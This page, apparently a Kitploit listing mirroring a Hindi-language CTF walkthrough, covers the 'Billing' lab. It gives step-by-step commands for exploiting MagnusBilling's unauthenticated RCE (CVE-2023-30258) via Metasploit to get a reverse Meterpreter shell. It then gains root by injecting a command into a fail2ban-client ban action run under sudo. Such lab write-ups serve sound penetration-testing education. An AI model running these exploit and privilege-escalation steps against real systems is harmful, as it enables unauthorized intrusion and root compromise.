Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Room-Walkthrough-Billing — बिलिंग रूम का उपयोग करके CVE-2023-30258 का शोषण करने और fail2ban गलत कॉन्फ़िगरेशन के माध्यम से एस्केलेट करने का विस्तृत वॉकथ्रू | Kitploit
उपकरण/GitHubGitHub/adityabhatt3010/room-walkthrough-billing
विशेषाधिकार वृद्धिटोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHubadityabhatt3010/room-walkthrough-billing

Room-Walkthrough-Billing

बिलिंग रूम का उपयोग करके CVE-2023-30258 का शोषण करने और fail2ban गलत कॉन्फ़िगरेशन के माध्यम से एस्केलेट करने का विस्तृत वॉकथ्रू

रिपॉजिटरी देखें
14102 महीने पहलेअभी तक समीक्षित नहीं

🧠 कक्ष चलना: बिलिंग

द्वारा लिखित: आदित्य भट्ट | ओपन सोर्स योगदानकर्ता


📦 अवलोकन

इस वॉकथ्रू में, हम पूरी ताकत से बिलिंग रूम में प्रवेश करेंगे, एक कमजोर MagnusBilling इंस्टेंस, एक रसदार बिना प्रमाणीकरण वाला RCE (CVE-2023-30258), और एक fail2ban sudo गलत कॉन्फ़िगरेशन जो चिल्लाकर कहता है “मुझे रूट करो।”

यह कक्ष स्वचालित शोषण और रचनात्मक विशेषाधिकार वृद्धि को खूबसूरती से मिश्रित करता है, हमें वास्तविक दुनिया के दोषों का एक हाथों-हाथ स्वाद देता है जो VoIP बिलिंग सॉफ्टवेयर में छिपे हुए हैं। हम प्रारंभिक टोही से रूट शेल तक पूर्ण PoC, टिप्पणी, और 🗿 वाइब्स के साथ जाएंगे।


🌐 चरण 1: गणना चरण

🏁 प्रारंभिक लैंडिंग

मशीन को तैनात करने के बाद, पहली चीज जो आपको गलत कॉन्फ़िगर किए गए फ़ायरवॉल की तरह मारती है:

http://<machine_IP>/mbilling/

यह MagnusBilling लॉगिन पृष्ठ है। यह अकेला घंटी बजाता है — आप जानते हैं कि आप कुछ रसदार CVE खेलने वाले हैं।

Site


🔍 Nmap गहन टोही + Gobuster

हम अंतिम टोही संयोजन से शुरू करते हैं:

nmap -A -sV -p- 10.10.115.173

🧠 निष्कर्ष:

  • पोर्ट 5038 – Asterisk Call Manager/2.10.6
  • अन्य HTTP सेवाएँ /mbilling/ के अंतर्गत उपलब्ध हैं

अगला, हम Gobuster के साथ पूर्ण ब्रूट पर जाते हैं:

gobuster dir -u http://10.10.115.173/mbilling -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .php,.html,.txt
gobuster dir -u http://10.10.115.173/ -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .php,.html,.txt

🧠 निष्कर्ष:

  • robots.txt

Robots

🏗️ robots.txt

फिर हम किसी भी मसालेदार चीज़ के लिए साइट के robots.txt की जाँच करते हैं:

User-agent: *
Disallow: /mbilling/

हम्म… इसे छिपाने की कोशिश करना हमें और अधिक चाहने पर मजबूर करता है 😈

Robots


🔌 चरण 2: शोषण

🔥 पोर्ट 5038 – Asterisk Manager

एक त्वरित netcat परीक्षण पुष्टि करता है कि यह प्रतिक्रिया देता है:

Response: Error
Message: Missing action in request

जो आगे पुष्टि करता है: बैकएंड MagnusBilling है, और पोर्ट Asterisk Call Manager से जुड़ा है। अपनी काली कलाओं को बुलाने का समय 🧙

5038


⚔️ युद्ध का हथियार: CVE-2023-30258

शोषण: MagnusBilling में बिना प्रमाणीकरण के दूरस्थ कोड निष्पादन मॉड्यूल: exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258

Metasploit चालू करें:

msfconsole
use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258

msf_1

फिर आवश्यकताओं की जाँच करें:

show options

msf_2

फिर निम्नलिखित सेट करें:

set RHOSTS 10.10.115.173
set LHOST 10.17.88.138
run

msf_3
msf_4

कुछ सेकंड बाद… Boom. हमें एक Meterpreter सत्र मिल गया!

shell
whoami ➤ asterisk
uname -a ➤ Linux Debian 6.1 x86_64

TTY शेल प्राप्त करने का प्रयास किया:

python3 -c 'import pty; pty.spawn("/bin/bash")'

msf_5_1


🧭 चरण 3: उपयोगकर्ता गणना

हम ऊपर की ओर बढ़ना शुरू करते हैं:

cd ..
cd ..

msf_5_2

जब तक हमें नहीं मिलता:

cd /home/magnus
cat user.txt

msf_6

बढ़िया! लेकिन हमने अभी काम खत्म नहीं किया है। हमें रूट चाहिए, और Magnus हमें रहस्य फुसफुसा रहा है।


🧨 चरण 4: विशेषाधिकार वृद्धि

आइए देखें कि हम sudo के साथ क्या चला सकते हैं:

sudo -l

परिणाम:

(ALL) NOPASSWD: /usr/bin/fail2ban-client

अब यह 🔥 है। हम fail2ban-client का दुरुपयोग करके बैन एक्शन का उपयोग करके रूट के रूप में कमांड निष्पादित कर सकते हैं।


🎯 Fail2Ban दुरुपयोग → रूट शेल

आइए fail2ban को पुनरारंभ करें:

sudo /usr/bin/fail2ban-client restart

फिर रूट फ्लैग चुराने के लिए कमांड इंजेक्ट करें:

sudo /usr/bin/fail2ban-client set sshd action iptables-multiport actionban "/bin/bash -c 'cat /root/root.txt > /tmp/root.txt && chmod 777 /tmp/root.txt'"

बैन (और इस प्रकार कमांड) को ट्रिगर करें:

sudo /usr/bin/fail2ban-client set sshd banip 127.0.0.1

फिर:

cat /tmp/root.txt

msf_7

रूट हो गया। एकदम। बॉस की तरह। 🗿🔥


✅ अंतिम सारांश तालिका

🔎 चरण💥 कार्रवाई/प्रयुक्त उपकरण
प्रारंभिक पहुंचNmap + Gobuster का उपयोग करके /mbilling पोर्टल और पोर्ट 5038 की खोज की
टोही खोजMagnusBilling CMS + Asterisk Call Manager
शोषणCVE-2023-30258 Metasploit के माध्यम से → Meterpreter शेल
गणना/home/magnus/user.txt स्थित किया
विशेषाधिकार वृद्धिfail2ban-client sudo NOPASSWD का दुरुपयोग → रूट के रूप में RCE
रूट फ्लैगfail2ban पेलोड इंजेक्शन के माध्यम से /root/root.txt प्राप्त किया

🧠 आपने क्या सीखा (उर्फ अर्ध-पेशेवर ज्ञान)

  1. 🔍 टोही सिर्फ स्कैनिंग नहीं है – छिपे हुए पृष्ठों की तलाश करें, robots.txt की जाँच करें, और अजीब पोर्ट में गहराई से जाएँ।
  2. 💣 ज्ञात CVEs का शोषण करें – MagnusBilling एक सार्वजनिक शोषण (CVE-2023-30258) के लिए कमजोर था।
  3. 🔓 विशेषाधिकार वृद्धि का अर्थ हमेशा कर्नेल शोषण नहीं होता – गलत कॉन्फ़िगर किए गए sudo अधिकार (जैसे fail2ban-client पर) उतने ही खतरनाक हैं।
  4. ⚙️ रचनात्मकता मायने रखती है – बैन एक्शन के साथ उपयोगकर्ता प्रतिबंधों को बायपास करना वास्तविक दुनिया की पार्श्व सोच दर्शाता है।

🗿 अंतिम शब्द

यह बॉक्स स्वचालित शोषण और मैनुअल पोस्ट-शोषण रचनात्मकता का एक सुंदर संतुलन था। MagnusBilling RCE से fail2ban-रूटिंग तक, यह एक पेंटेस्टर की प्लेलिस्ट 🎧🎯 के लिए सभी सही नोट्स को हिट करता है।

चाहे आप एक शुरुआती हों जो स्तर ऊपर ले जाना चाहते हैं या एक अनुभवी योद्धा जो झंडे इकट्ठा कर रहे हैं — यह एक अवश्य-पाउन है।

अगली बार तक, खतरनाक रहें। उत्सुक रहें। राजसी रहें। 🗿

टूल डाउनलोड करें